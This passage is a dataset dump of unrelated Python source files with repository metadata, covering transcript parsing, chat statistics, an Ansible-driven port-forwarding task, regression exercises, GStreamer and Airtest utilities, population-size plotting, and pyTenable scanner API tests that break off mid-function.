] | permissive | richard-duong/GuessTheClass | 960082dc212d7c8190f6d605735e0a3afb7d486a | e68c2a0a2fbb7b488450d27b36b52f2b4259e0b1 | refs/heads/main | 2023-05-08T04:03:44.594539 | 2021-05-14T22:59:16 | 2021-05-14T22:59:16 | 340,517,890 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 762 | py | import re
import YoutubeRegex
class YoutubeParseHandler:
def __init__(self):
self.__wordsList = []
def __parseFile(self, transcript):
with open(transcript, "r") as inFile:
text = inFile.read()
text = re.sub(YoutubeRegex.BASIC_FILTER + "|" + YoutubeRegex.ACTION + "|"
+ YoutubeRegex.ARROW + "|" + YoutubeRegex.DICTATE_SPEAKER, " ", text)
self.__wordsList = text.split()
def __writeFile(self, filteredFile):
with open(filteredFile, "w") as outFile:
for word in self.__wordsList:
outFile.write("{}\n".format(word.lower()))
def parse(self, transcript, filteredFile):
self.__parseFile(transcript)
self.__writeFile(filteredFile)
| [
"rduon008@ucr.edu"
] | rduon008@ucr.edu |
dc020b3930bd8abb2cf10b358f9075e9aea0aab2 | e5c24e5c810a99bd326384a0d222bc8af0ac3bd9 | /chat_analyzer/models/chat_data.py | 1cd716d120105ae8437a4851d56ebc8ca1970df2 | [] | no_license | sechlol/whatsapp-chat-analyzer | aaaef061de9bd1776204a5e603df98677879a051 | e9506b5a482e9f29e80b0039702df648c5dd0312 | refs/heads/master | 2022-11-27T08:25:23.732721 | 2022-11-20T17:53:45 | 2022-11-20T17:53:45 | 218,354,333 | 0 | 0 | null | 2022-11-20T17:54:33 | 2019-10-29T18:20:02 | Python | UTF-8 | Python | false | false | 1,865 | py | from dataclasses import dataclass, field
from datetime import datetime, date
from typing import List, Dict
from chat_analyzer.models.chat_schemas import ChatMessageStatSchema, StatsWrapperSchema
@dataclass
class Message:
sender: str
date: datetime
text: str
@dataclass
class Chat:
name: str
participants: List[str] = field(default_factory=list)
messages: List[Message] = field(default_factory=list)
def add_message(self, message: Message):
self.messages.append(message)
if message.sender not in self.participants:
self.participants.append(message.sender)
@dataclass
class UserMessageStat:
username: str
message_count: int
message_percent: float
word_count: int
word_percent: float
avg_words_per_message: float
@dataclass
class ChatMessageStat:
total_messages_count: int
total_words_count: int
user_stats: List[UserMessageStat]
def to_json(self):
return ChatMessageStatSchema().dump(self)
@dataclass
class Score:
label: str
value: float
@dataclass
class MessagesPerDayStat:
date_sent: date
scores: List[Score]
def get_labels(self) -> List[str]:
return [s.label for s in self.scores]
def get_indexed_values(self) -> Dict[str, float]:
return {s.label: s.value for s in self.scores}
@dataclass
class StatsWrapper:
legend: List[str]
stats: List[MessagesPerDayStat]
def get_sorted_dates(self) -> List[date]:
return [s.date_sent for s in self.stats]
def get_indexed_by_date(self) -> Dict[date, MessagesPerDayStat]:
return {s.date_sent: s for s in self.stats}
def get_indexed_by_date_raw(self) -> Dict[date, Dict[str, float]]:
return {s.date_sent: s.get_indexed_values() for s in self.stats}
def to_json(self):
return StatsWrapperSchema().dump(self)
| [
"ccardin.sech@gmail.com"
] | ccardin.sech@gmail.com |
6c1bf8a8173f069af524c50af7366e3150d5b5a6 | 5adb0e3bce712efb68b241421cd12e71d0401d98 | /tasks/ehco.py | acf54d41b71c3edc251e2ea7866628ff0119bf2b | [
"MIT"
] | permissive | librestar/backend | 8e945c3953ec59b4717704a5ebfc613ed756cba1 | 9060453d140d4c1785b370fd548be519d04047d4 | refs/heads/main | 2023-02-11T03:36:33.584588 | 2021-01-14T07:34:08 | 2021-01-14T07:34:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | import json
import typing as t
import ansible_runner
from uuid import uuid4
from app.db.session import SessionLocal
from app.db.models.port import Port
from app.db.models.user import User
from app.db.models.server import Server
from app.db.models.port_forward import PortForwardRule
from app.db.crud.server import get_server
from app.db.crud.port import get_port
from tasks import celery_app
from tasks.utils.runner import run_async
from tasks.utils.handlers import iptables_finished_handler, status_handler
@celery_app.task()
def ehco_runner(
port_id: int,
server_id: int,
port_num: int,
args: str = None,
remote_ip: str = None,
update_status: bool = False,
**kwargs,
):
server = get_server(SessionLocal(), server_id)
extravars = {
"host": server.ansible_name,
"local_port": port_num,
"remote_ip": remote_ip,
"ehco_args": args,
"update_status": update_status,
"update_ehco": update_status and not server.config.get('ehco'),
}
r = run_async(
server=server,
playbook="ehco.yml",
extravars=extravars,
status_handler=lambda s, **k: status_handler(port_id, s, update_status),
finished_callback=iptables_finished_handler(server, port_id, True)
if update_status
else lambda r: None,
)
return r[1].config.artifact_dir
| [
"me@leishi.io"
] | me@leishi.io |
08e0cb2008377b5bf7623e9235abde9b1ed3838c | f43a35dd0aab1bdbcf4f281281db2f5b2fdfbd5f | /Machine Learning practice/regression.py | 1139a60862f8ab27ce12788267bba239d79f1432 | [] | no_license | ganzhiruyi/Machine-Learning | 8d75ce5f37db9bec426a136cbfbaf4301bdd8a06 | 66dcba15bb41ce4613b055ec673547f429627dcf | refs/heads/master | 2021-01-18T10:03:40.321880 | 2016-03-03T14:43:19 | 2016-03-03T14:43:19 | 39,997,167 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,453 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2016-01-19 10:57:07
# @Author : ganzhiruyi (ganzhiruyi0@gmail.com)
# @Link : https://github.com/ganzhiruyi
# @Version : $1.0$
from numpy import *
import numpy as np
import matplotlib.pyplot as plt
def loadDataSet(filePath):
# 导入数据,数据每行的最后一个是Y值
X = loadtxt(filePath, delimiter='\t')
Y = X[:, -1]
X = X[:, :-1] # 第一个一直是1,表示常数项
return X, Y
def standRegress(X, Y):
# 最小二乘法,返回回归系数
X = mat(X)
Y = mat(Y).transpose()
if linalg.det(X.T * X) == 0.0:
raise ValueError('The matrix is singular, cannot inverse.')
w = (X.T * X).I * (X.T * Y)
return w
def plot2DRegress(X, Y, w):
plt.scatter(X[:, 1], Y) # 画图要把X只取x变量部分
y = X * w
plt.plot(X[:, 1], y)
plt.show()
def lwlr(x, X, Y, k):
# 根据每个点x和整个数据集X的差距,计算一个对应的y值
X = mat(X)
Y = mat(Y).transpose()
m, n = X.shape
weights = mat(eye(m))
for j in range(m):
diffMat = x - X[j, :]
weights[j, j] = exp(diffMat * diffMat.T / (-2.0 * k**2))
xTx = X.T * (weights * X)
if linalg.det(xTx) == 0.0:
raise ValueError('The matrix is singular, cannot inverse.')
w = xTx.I * (X.T * weights * Y)
return x * w
def lwlrTest(testArr, X, Y, k=1.0):
# 得到所有testArr关于X,Y的预测值
m, n = testArr.shape
yHat = zeros(m)
for i in range(m):
yHat[i] = lwlr(testArr[i], X, Y, k)
return yHat
def plot2Dlwlr(X, Y, yHat):
sortedIdices = X[:, 1].argsort()
xSort = X[sortedIdices]
ySort = yHat[sortedIdices]
plt.scatter(X[:, 1], Y)
plt.plot(xSort[:, 1], ySort, c='r')
plt.show()
def regularize(X):
# 按列进行正则化
retX = X.copy()
xMean = mean(retX, axis=0)
invarX = var(retX, axis=0)
retX = (retX - xMean) / invarX
return retX
def rssError(yTrue, yPred):
# 统计均方误差
return ((yTrue - yPred)**2).sum()
def stagewise(X, Y, eps=0.01, numIters=200):
# 前向逐步线性回归
X = mat(X)
m, n = X.shape
Y = mat(Y).transpose()
yMean = mean(Y)
Y = Y - yMean
X = regularize(X) # 这里的这个处理对于第一列全为1就会出错
# from sklearn import preprocessing
# X = preprocessing.normalize(X)
w = zeros((n, 1))
wTest = w.copy()
wBest = w.copy()
returnMat = mat(zeros((numIters, n)))
for i in range(numIters):
minRssError = inf
for j in range(n):
for sign in [-1, 1]:
wTest = w.copy()
wTest[j] += sign * eps
yTest = X * wTest
error = rssError(Y.A, yTest.A)
if error < minRssError:
minRssError = error
wBest = wTest
w = wBest.copy()
returnMat[i, :] = w.T
return returnMat
def plotWs(ws):
# 画出相关系数随迭代次数的变化规律
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(ws)
plt.show()
# X, Y = loadDataSet('data/8-2.txt')
X, Y = loadDataSet('data/8-abalone.txt')
print X
# 测试standRegress
# w = standRegress(X, Y)
# plot2DRegress(X, Y, w)
# 测试lwlr
# yHat = lwlrTest(X,X,Y,k=0.01)
# plot2Dlwlr(X, Y, yHat)
# 测试前向逐步回归 stagewise
ws = stagewise(X, Y, eps=0.005, numIters=1000)
plotWs(ws)
| [
"ganzhiruyi0@gmail.com"
] | ganzhiruyi0@gmail.com |
f4d86205e1bdc26657ecf48b6f002cbc9c14fb93 | 0c7299e097391daefd66d55d3e5e8ed11aa3519e | /helloworld.py | bb18c60a5eb60b7db8cd4e5eaf3f1af6413c09c1 | [] | no_license | shola/caltrain-dashboard | c4560e71a1a3b81bd0ec119e6d1bb17514e7d48c | 289b88c7c9d10cbdfbddc23fdf04bbd6ccef4d2f | refs/heads/master | 2021-01-16T20:48:36.683416 | 2015-06-16T19:52:39 | 2015-06-16T19:52:39 | 37,552,559 | 0 | 0 | null | 2015-06-16T19:52:18 | 2015-06-16T19:52:18 | null | UTF-8 | Python | false | false | 12 | py | merge hell!
| [
"bchoi@splunk.com"
] | bchoi@splunk.com |
6c41461da6b1f280e4708e60c3c8f1ec4ac26eb0 | 94fb9ca84285fa6e570c21208e2e5b2d3ac201db | /Observer/Observer_Controller.py | 28e42cbcfa8ba19b567b11f5d020779f2adb8fb5 | [] | no_license | kmu-cs-swp2-2018/class-01-Kimmyeonghwan | ba3bf280ef7646bf2c9b20305c3bff916d7e918c | b2e77485b257e3e64c3a550a2e757e135d1de73b | refs/heads/master | 2022-12-03T00:40:30.468292 | 2018-11-21T12:17:05 | 2018-11-21T12:17:05 | 146,683,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | py | from Observer_View import View
from Observer_Model import Model
def Main():
re = 0
model = Model()
view = View()
while(re != 9):
print("현재 시간 : {}년 {}월 {}일 {}시 {}분 {}초".format(view.ts.tm_year, view.ts.tm_mon, view.ts.tm_mday, view.ts.tm_hour, view.ts.tm_min, view.ts.tm_sec))
print("현재 온도 : {}, 현재 습도 : {}".format(view.temp, view.humidity))
print("날씨 : {}".format(view.weather))
Model.list() # self 사용이 아니라서 model 말고 Model 사용
re = int(input("숫자를 입력해주세요. : "))
if re == 1:
view.todayReplace(model.replaceDay(view.dateReplace()))
if re == 2:
view.weatherReplace(model.replaceWeather())
if re == 3:
view.tempHumidityReplace(model.replaceTempHumidity)
if re == 4:
view.todayNow()
if re == 5:
view.weatherNow()
if re == 6:
view.tempHumidityNow()
if __name__ == '__main__':
Main() | [
"myeonghwan2@kookmin.ac.kr"
] | myeonghwan2@kookmin.ac.kr |
d00b698f5834c6af3e0263f050a51ecf6db3b475 | f040ec51ef570adbd8240555eba1d0cd9709bb6e | /GstExample/basic-tutorial-4.py | 906bb080d1074246a75c505dd7c2248ca9b035a3 | [] | no_license | WassabiVl/WebServerGstreamer | 7d1c8b6a0670bdc60789308237d2c27700fcd573 | 77d8522e297dc04b64a1dfc2dd8fcef539f65778 | refs/heads/master | 2020-03-20T06:23:17.669426 | 2018-08-27T09:48:12 | 2018-08-27T09:48:12 | 137,247,763 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,871 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# GStreamer SDK Tutorials in Python
#
# basic-tutorial-4
#
"""
basic-tutorial-4: Time management
http://docs.gstreamer.com/display/GstSDK/Basic+tutorial+4%3A+Time+management
"""
import sys
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
# Python version of GST_TIME_ARGS
data = dict()
data["playing"] = False
data["terminate"] = False
data["seek_enabled"] = False
data["seek_done"] = False
data["duration"] = Gst.CLOCK_TIME_NONE
def convert_ns(t):
s, ns = divmod(t, 1000000000)
m, s = divmod(s, 60)
if m < 60:
return "0:%02i:%02i.%i" % (m, s, ns)
else:
h, m = divmod(m, 60)
return "%i:%02i:%02i.%i" % (h, m, s, ns)
def handle_message(data, msg):
if msg.type == Gst.MessageType.ERROR:
err, debug = msg.parse_error()
print("Error received from element %s: %s" % (msg.src.get_name(), err), file=sys.stderr)
print("Debugging information: %s" % debug, file=sys.stderr)
data["terminate"] = True
elif msg.type == Gst.MessageType.EOS:
print("End-Of-Stream reached.")
data["terminate"] = True
elif msg.type == Gst.MessageType.DURATION_CHANGED:
# The duration has changed, mark the current one as invalid
data["duration"] = Gst.CLOCK_TIME_NONE
elif msg.type == Gst.MessageType.STATE_CHANGED:
if msg.src == data["playbin"]:
old_state, new_state, pending_state = msg.parse_state_changed()
print("Pipeline state changed from %s to %s." % (old_state.value_nick, new_state.value_nick))
data["playing"] = (new_state == Gst.State.PLAYING)
if data["playing"]:
query = Gst.Query.new_seeking(Gst.Format.TIME)
if data["playbin"].query(query):
(aux, data["seek_enabled"], start, end) = query.parse_seeking()
if data["seek_enabled"]:
print("Seeking is ENABLED from %s to %s" % (convert_ns(start), convert_ns(end)))
else:
print("Seeking is DISABLED for this stream.")
else:
print("Seeking query failed.", file=sys.stderr)
else:
print("Unexpected message received.", file=sys.stderr)
def main():
# Create the elements
data["playbin"] = Gst.ElementFactory.make("playbin", "playbin")
if not data["playbin"]:
print("Not all elements could be created.", file=sys.stderr)
exit(-1)
# Set the URI to play
data["playbin"].set_property(
"uri", "https://www.freedesktop.org/software/gstreamer-sdk/data/media/sintel_trailer-480p.webm")
# Start playing
ret = data["playbin"].set_state(Gst.State.PLAYING)
if ret == Gst.StateChangeReturn.FAILURE:
print("Unable to set the pipeline to the playing state.", file=sys.stderr)
exit(-1)
# Listen to the bus
bus = data["playbin"].get_bus()
while not data["terminate"]:
message = bus.timed_pop_filtered(100 * Gst.MSECOND,
Gst.MessageType.STATE_CHANGED |
Gst.MessageType.ERROR |
Gst.MessageType.EOS |
Gst.MessageType.DURATION_CHANGED)
# Parse message
if message:
handle_message(data, message)
else:
if data["playing"]:
fmt = Gst.Format.TIME
current = -1
# Query the current position of the stream
_, current = data['playbin'].query_position(fmt)
if not current:
print("Could not query current position", file=sys.stderr)
# If we didn't know it yet, query the stream duration
if data["duration"] == Gst.CLOCK_TIME_NONE:
_, data["duration"] = data['playbin'].query_duration(fmt)
if not data["duration"]:
print("Could not query current duration", file=sys.stderr)
print("Position %s / %s\r" % (
convert_ns(current), convert_ns(data["duration"])), end=' ')
sys.stdout.flush()
# If seeking is enabled, we have not done it yet, and the time is
# right, seek
if data["seek_enabled"] and not data["seek_done"] and current > 10 * Gst.SECOND:
print("\nReached 10s, performing seek...")
data['playbin'].seek_simple(Gst.Format.TIME, Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,
30 * Gst.SECOND)
data["seek_done"] = True
# Free resources
data["playbin"].set_state(Gst.State.NULL)
main()
| [
"wa@lombego.de"
] | wa@lombego.de |
953f9fc2f8c41cae91dcb576a328561653318abd | 989e16ccb5569cd514a2a0cd41c04392248eeae3 | /airtest/utils/logwraper.py | b86b7d8d0ddf1ce8712d67747ccd8b44f6875b34 | [
"Apache-2.0"
] | permissive | wb-qiujuli/Airtest | 1dc98e385efae4aa18a8ffc879ad6ec7a8f7dbac | 4f73a03a62f11a8010769eda4b53a53a74a8d16c | refs/heads/master | 2020-03-19T01:09:53.709209 | 2018-05-31T01:31:04 | 2018-05-31T01:31:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,116 | py | # _*_ coding:UTF-8 _*_
import os
import sys
import json
import time
import functools
import traceback
from .logger import get_logger
LOGGING = get_logger(__name__)
class AirtestLogger(object):
"""logger """
def __init__(self, logfile, debug=False):
super(AirtestLogger, self).__init__()
self.logfile = None
self.logfd = None
self.debug = debug
self.running_stack = []
self.extra_log = {}
self.set_logfile(logfile)
# atexit.register(self.handle_stacked_log)
def set_logfile(self, logfile):
if logfile is None:
self.logfile = None
self.logfd = None
else:
self.handle_stacked_log()
self.logfile = os.path.realpath(logfile)
self.logfd = open(self.logfile, "w")
@staticmethod
def _dumper(obj):
try:
return obj.__dict__
except:
return None
def log(self, tag, data, in_stack=True):
''' Not thread safe '''
# if self.debug:
# print(tag, data)
LOGGING.debug("%s: %s" % (tag, data))
if in_stack:
depth = len(self.running_stack)
else:
depth = 1
if self.logfd:
try:
log_data = json.dumps({'tag': tag, 'depth': depth, 'time': time.strftime("%Y-%m-%d %H:%M:%S"), 'data': data}, default=self._dumper)
except UnicodeDecodeError:
log_data = json.dumps({'tag': tag, 'depth': depth, 'time': time.strftime("%Y-%m-%d %H:%M:%S"), 'data': repr(data).decode(sys.getfilesystemencoding())}, default=self._dumper)
self.logfd.write(log_data + '\n')
self.logfd.flush()
def handle_stacked_log(self):
# 处理stack中的log
while self.running_stack:
# 先取最后一个,记了log之后再pop,避免depth错误
log_stacked = self.running_stack[-1]
self.log("function", log_stacked)
self.running_stack.pop()
def Logwrap(f, logger):
LOGGER = logger
@functools.wraps(f)
def wrapper(*args, **kwargs):
start = time.time()
fndata = {'name': f.__name__, 'args': args, 'kwargs': kwargs}
LOGGER.running_stack.append(fndata)
try:
res = f(*args, **kwargs)
except Exception as e:
data = {"traceback": traceback.format_exc(), "time_used": time.time() - start, "error_str": str(e)}
fndata.update(data)
fndata.update(LOGGER.extra_log)
LOGGER.log("error", fndata)
LOGGER.running_stack.pop()
raise
else:
time_used = time.time() - start
LOGGING.debug("%s%s Time used: %3fs" % ('>' * len(LOGGER.running_stack), f.__name__, time_used))
# sys.stdout.flush()
fndata.update({'time_used': time_used, 'ret': res})
fndata.update(LOGGER.extra_log)
LOGGER.log('function', fndata)
LOGGER.running_stack.pop()
finally:
LOGGER.extra_log = {}
return res
return wrapper
| [
"gzliuxin@corp.netease.com"
] | gzliuxin@corp.netease.com |
fa2acf3dc47b01789ae0535085f48b6e22aff68d | 3e5695a1e80d3696cea8b902d06078f9b77387a7 | /demesdraw/size_history.py | 3b967b152a6b2e700e522df64d6afa7c80562c82 | [] | no_license | apragsdale/demesdraw | 9a3312db81ee58e343272a6b9b517538b0078682 | 26f817a66a7f8fe00c99e41f1b774c501c5a8d3b | refs/heads/main | 2023-03-20T22:09:38.588301 | 2021-03-11T19:51:37 | 2021-03-11T19:51:37 | 346,859,777 | 0 | 0 | null | 2021-03-11T22:42:17 | 2021-03-11T22:42:17 | null | UTF-8 | Python | false | false | 10,190 | py | import demes
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from demesdraw import utils
def size_history(
graph: demes.Graph,
ax: matplotlib.axes.Axes = None,
inf_ratio: float = 0.1,
inf_label: bool = False,
invert_x: bool = False,
num_exp_points: int = 100,
annotate_epochs: bool = False,
cmap: matplotlib.colors.Colormap = None,
log_x: bool = False,
log_y: bool = False,
title: str = None,
):
"""
Plot population size as a function of time for each deme in the graph.
:param demes.Graph graph: The demes graph to plot.
:param matplotlib.axes.Axes ax: The matplotlib axes onto which the figure
will be drawn. If None, an empty axes will be created for the figure.
:param float inf_ratio: The proportion of the horizontal axis that will be
used for the time interval which stretches towards infinity.
:param bool inf_label: Write "inf" by the arrow that points towards infinity.
:param bool invert_x: If true, the horizontal axis will have infinity
on the left and zero on the right, and the vertical axis will be drawn
on the right.
:param int num_exp_points: The number of points used to approximate
size changes in each epoch with exponential size_function.
:param bool annotate_epochs: Annotate the figure with epoch indices
over the relevant parts of the lines. This is mostly useful as a
pedagogical tool.
:param matplotlib.colors.Colormap cmap: A matplotlib colour map to be used
for the different demes. Get one with :func:`matplotlib.cm.get_cmap()`.
If None, tab10 or tab20 will be used, depending on the number of demes.
:param bool log_x: Use a log-10 scale for the horizontal axis.
:param bool log_y: Use a log-10 scale for the vertical axis.
:param str title: The title of the figure.
:return: The matplotlib axes onto which the figure was drawn.
:rtype: matplotlib.axes.Axes
"""
if ax is None:
fig_w, fig_h = plt.figaspect(9.0 / 16.0)
_, ax = plt.subplots(figsize=(fig_w, fig_h))
if invert_x:
arrowhead = "<k"
else:
arrowhead = ">k"
if cmap is None:
if len(graph.demes) <= 10:
cmap = matplotlib.cm.get_cmap("tab10")
elif len(graph.demes) <= 20:
cmap = matplotlib.cm.get_cmap("tab20")
else:
raise ValueError(
"Graph has more than 20 demes, so cmap must be specified. Good luck!"
)
inf_start_time = utils.inf_start_time(graph, inf_ratio, log_x)
linestyles = ["solid"] # , "dashed", "dashdot"]
linewidths = [2, 4, 8, 1]
legend_handles = []
# Top of the z order stacking.
z_top = 1 + len(graph.demes) + max(linewidths)
for j, deme in enumerate(graph.demes):
colour = cmap(j)
linestyle = linestyles[j % len(linestyles)]
linewidth = linewidths[j % len(linewidths)]
plot_kwargs = dict(
color=colour,
linestyle=linestyle,
linewidth=linewidth,
label=deme.id,
alpha=0.7,
zorder=z_top - linewidth,
solid_capstyle="butt",
)
discontinuity_kwargs = dict(
color=colour,
linestyle=":",
linewidth=linewidth,
alpha=0.7,
zorder=z_top - linewidth,
solid_capstyle="butt",
)
legend_handles.append(matplotlib.lines.Line2D([], [], **plot_kwargs))
for k, epoch in enumerate(deme.epochs):
start_time = epoch.start_time
if np.isinf(start_time):
start_time = inf_start_time
end_time = epoch.end_time
if end_time == 0 and log_x:
end_time = 1
if epoch.size_function == "constant":
x = np.array([start_time, end_time])
y = np.array([epoch.start_size, epoch.end_size])
elif epoch.size_function == "exponential":
x = np.linspace(start_time, end_time, num=num_exp_points)
dt = np.linspace(0, 1, num=num_exp_points)
r = np.log(epoch.end_size / epoch.start_size)
y = epoch.start_size * np.exp(r * dt)
else:
raise ValueError(
f"Don't know how to plot epoch {k} with "
f'"{epoch.size_function}" size_function.'
)
ax.plot(x, y, **plot_kwargs)
if k > 0 and deme.epochs[k - 1].end_size != epoch.start_size:
# Indicate population size discontinuity.
ax.plot(
[deme.epochs[k - 1].end_time, epoch.start_time],
[deme.epochs[k - 1].end_size, epoch.start_size],
**discontinuity_kwargs,
)
if annotate_epochs:
if log_x:
text_x = np.exp((np.log(start_time) + np.log(end_time)) / 2)
else:
text_x = (start_time + end_time) / 2
if log_y:
text_y = np.exp(
(np.log(1 + epoch.start_size) + np.log(1 + epoch.end_size)) / 2
)
else:
text_y = (epoch.start_size + epoch.end_size) / 2
ax.annotate(
f"epoch {k}",
(text_x, text_y),
ha="center",
va="bottom",
xytext=(0, 4 + linewidth / 2), # vertical offset
textcoords="offset points",
# Give the text some contrast with its background.
bbox=dict(
boxstyle="round", fc="white", ec="none", alpha=0.6, pad=0
),
# This is only really a useful feature with 1 deme,
# but at least try to do something reasonable for more demes.
color="black" if len(graph.demes) == 1 else colour,
)
if np.isinf(deme.start_time):
# Plot an arrow at the end of the line, to indicate this
# line extends towards infinity.
ax.plot(
inf_start_time,
deme.epochs[0].start_size,
arrowhead,
color=colour,
clip_on=False,
zorder=z_top,
)
if inf_label:
ax.annotate(
"inf",
(inf_start_time, deme.epochs[0].start_size),
xytext=(0, -6), # vertical offset
textcoords="offset points",
clip_on=False,
ha="center",
va="top",
)
# Indicate population size discontinuities from ancestor demes.
for ancestor_id in deme.ancestors:
anc = graph[ancestor_id]
anc_N = utils.size_of_deme_at_time(anc, deme.start_time)
deme_N = deme.epochs[0].start_size
if anc_N != deme_N:
ax.plot(
[deme.start_time, deme.start_time],
[anc_N, deme_N],
**discontinuity_kwargs,
)
if len(graph.demes) > 1:
leg = ax.legend(handles=legend_handles, ncol=len(graph.demes) // 2)
leg.set_zorder(z_top)
if title is not None:
ax.set_title(title)
# Arrange the axes spines, ticks and labels.
ax.set_xlim(1 if log_x else 0, inf_start_time)
# ax.set_ylim(1 if log_y else 0, None)
ax.spines["top"].set_visible(False)
if invert_x:
ax.spines["left"].set_visible(False)
ax.invert_xaxis()
ax.yaxis.tick_right()
ax.yaxis.set_label_position("right")
else:
ax.spines["right"].set_visible(False)
ax.set_xlabel(f"time ago ({graph.time_units})")
# ax.set_ylabel("N", rotation=0, ha="left" if invert_x else "right")
ax.set_ylabel("deme\nsize", rotation=0, labelpad=20)
if log_x:
ax.set_xscale("log", base=10)
if log_y:
ax.set_yscale("log", base=10)
ax.figure.tight_layout()
return ax
def parse_args():
import argparse
parser = argparse.ArgumentParser(
description="Plot N(t) for all demes in a Demes graph."
)
parser.add_argument(
"--inf-ratio",
type=float,
default=0.1,
help=(
"The proportion of the horizontal axis that will be "
"used for the time interval which stretches towards infinity "
"[default=%(default)s]."
),
)
parser.add_argument(
"--invert-x",
action="store_true",
help=(
"Invert the horizontal axis. "
"I.e. draw the past on the left, the present on the right. "
"The vertical axis ticks/labels will also be drawn on the right. "
),
)
parser.add_argument(
"--log-x", action="store_true", help="Use a log scale for the horizontal axis."
)
parser.add_argument(
"--log-y", action="store_true", help="Use a log scale for the vertical axis."
)
parser.add_argument(
"--annotate-epochs",
action="store_true",
help=("Label each deme's epochs. " "Not recommended for more than one deme."),
)
parser.add_argument(
"yaml_filename",
metavar="demes.yaml",
help="The Demes graph to plot.",
)
parser.add_argument(
"plot_filename",
metavar="figure.pdf",
help=(
"Output filename for the figure. "
"Any file extension supported by matplotlib may be provided "
"(pdf, eps, png, svg)."
),
)
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
graph = demes.load(args.yaml_filename)
ax = size_history(
graph,
inf_ratio=args.inf_ratio,
invert_x=args.invert_x,
log_x=args.log_x,
log_y=args.log_y,
annotate_epochs=args.annotate_epochs,
)
ax.figure.savefig(args.plot_filename)
| [
"graham.gower@gmail.com"
] | graham.gower@gmail.com |
dace21adfb00aaf1f2863a3e40f9256a2a67b538 | 2d6d24c0bfee13fc4682dee52075e78a552a8d1c | /tests/io/test_scanners.py | 88b4c30ae125ae42fe97d5aa7678fd851b13a7be | [
"MIT"
] | permissive | sbiradarctr/pyTenable | b890875c5df3a1da676cebd57af51bc49666a7d2 | 2a6930cd7b29036780c291581d89ab33c0fd6679 | refs/heads/master | 2023-05-06T09:20:43.580412 | 2021-05-31T09:05:11 | 2021-05-31T09:05:11 | 371,701,521 | 0 | 0 | MIT | 2021-05-28T12:58:52 | 2021-05-28T12:58:52 | null | UTF-8 | Python | false | false | 7,003 | py | from tenable.errors import *
from ..checker import check, single
import uuid, pytest
@pytest.mark.vcr()
def test_scanner_control_scans_scanner_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.control_scan('nope', str(uuid.uuid4()), 'stop')
@pytest.mark.vcr()
def test_scanner_control_scans_scan_uuid_typeerror(api):
with pytest.raises(TypeError):
api.scanners.control_scan(1,1,'stop')
@pytest.mark.vcr()
def test_scanner_control_scans_action_typeerror(api):
with pytest.raises(TypeError):
api.scanners.control_scan(1,str(uuid.uuid4()), 1)
@pytest.mark.vcr()
def test_scanner_control_scans_action_unexpectedvalue(api):
with pytest.raises(UnexpectedValueError):
api.scanners.control_scan(1, str(uuid.uuid4()), 'nope')
@pytest.mark.vcr()
def test_scanner_control_scans_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.control_scan(1,
'c5e3e4c9-ee47-4fbc-9e1d-d6f39801f56c', 'stop')
@pytest.mark.vcr()
def test_scanner_control_scans_permissionerror(stdapi):
with pytest.raises(PermissionError):
stdapi.scanners.control_scan(1,
'c5e3e4c9-ee47-4fbc-9e1d-d6f39801f56c', 'stop')
@pytest.mark.vcr()
def test_scanner_delete_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.delete('nope')
@pytest.mark.vcr()
def test_scanner_delete_notfound(api):
with pytest.raises(NotFoundError):
api.scanners.delete(1)
@pytest.mark.vcr()
def test_scanner_delete_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.delete(scanner['id'])
@pytest.mark.skip(reason="We don't want to actually delete scanners.")
def test_scanner_delete(api, scanner):
api.scanners.delete(scanner['id'])
@pytest.mark.vcr()
def test_scanner_details_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.details('nope')
@pytest.mark.vcr()
def test_scanner_details_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.details(1)
@pytest.mark.vcr()
def test_scanner_details_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.details(scanner['id'])
@pytest.mark.vcr()
def test_scanner_details(api, scanner):
s = api.scanners.details(scanner['id'])
check(s, 'id', int)
check(s, 'uuid', 'scanner-uuid')
check(s, 'name', str)
check(s, 'type', str)
check(s, 'status', str)
check(s, 'scan_count', int)
check(s, 'engine_version', str)
check(s, 'platform', str)
check(s, 'loaded_plugin_set', str)
check(s, 'owner', str)
check(s, 'pool', bool)
@pytest.mark.vcr()
def test_scanner_edit_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.edit('nope')
@pytest.mark.vcr()
def test_sanner_edit_plugin_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], force_plugin_update='yup')
@pytest.mark.vcr()
def test_scanner_edit_ui_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], force_ui_update='yup')
@pytest.mark.vcr()
def test_scanner_edit_finish_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], finish_update='yup')
@pytest.mark.vcr()
def test_scanner_edit_registration_code_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], registration_code=False)
@pytest.mark.vcr()
def test_scanner_edit_aws_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], aws_update_interval='nope')
@pytest.mark.vcr()
@pytest.mark.xfail(raises=PermissionError)
def test_scanner_edit_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.edit(1, force_ui_update=True)
@pytest.mark.vcr()
def test_scanner_edit_permissionserror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.edit(scanner['id'], force_ui_update=True)
@pytest.mark.vcr()
@pytest.mark.xfail(raises=PermissionError)
def test_scanner_edit(api, scanner):
